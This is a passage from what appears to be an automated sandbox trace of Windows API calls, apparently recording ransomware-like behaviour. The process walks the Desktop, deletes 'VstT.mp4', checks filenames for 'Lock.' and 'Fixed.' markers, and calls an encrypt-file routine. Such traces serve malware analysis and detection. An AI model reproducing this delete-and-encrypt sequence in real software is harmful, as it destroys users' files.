"c:\\users\\fd1hvy\\desktop\\vstt.mp4")) returned 0x20 [0209.909] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\VstT.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c3dc180, ftCreationTime.dwHighDateTime=0x1d5ecb8, ftLastAccessTime.dwLowDateTime=0x527ca840, ftLastAccessTime.dwHighDateTime=0x1d5eb2b, ftLastWriteTime.dwLowDateTime=0x527ca840, ftLastWriteTime.dwHighDateTime=0x1d5eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x6d22, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="VstT.mp4", cAlternateFileName="")) returned 0xa87650 [0209.909] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\VstT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\vstt.mp4")) returned 1 [0209.963] FindNextFileW (in: hFindFile=0xa87650, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c3dc180, ftCreationTime.dwHighDateTime=0x1d5ecb8, ftLastAccessTime.dwLowDateTime=0x527ca840, ftLastAccessTime.dwHighDateTime=0x1d5eb2b, ftLastWriteTime.dwLowDateTime=0x527ca840, ftLastWriteTime.dwHighDateTime=0x1d5eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x6d22, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="VstT.mp4", cAlternateFileName="")) returned 0 [0209.964] FindClose (in: hFindFile=0xa87650 | out: hFindFile=0xa87650) returned 1 [0209.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0209.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0209.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0209.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0209.964] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0209.964] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0209.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0209.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0209.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42) returned 0x2e563a8 [0209.965] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/VstT.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\VstT.mp4", lpFilePart=0x8cf650*="VstT.mp4") returned 0x20 [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0209.965] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\VstT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\vstt.mp4")) returned 0xffffffff [0209.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.966] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0209.966] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.966] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0209.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0209.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WaYoUsnM2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aYoUsnM2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YoUsnM2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oUsnM2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsnM2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="snM2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nM2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UCIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CIentbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ientbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="entbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tbe.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="be.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0209.967] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0209.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0209.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0209.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0209.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0209.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2e7fce0 [0209.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WaYoUsnM2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aYoUsnM2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YoUsnM2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oUsnM2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsnM2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="snM2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nM2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UCIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CIentbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ientbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="entbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tbe.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="be.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0209.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0209.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0209.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0209.969] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0209.969] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0209.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0209.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0209.969] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0210.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0210.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0210.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0210.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0210.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0210.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.003] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0210.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53920 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0210.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0210.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0210.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0210.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 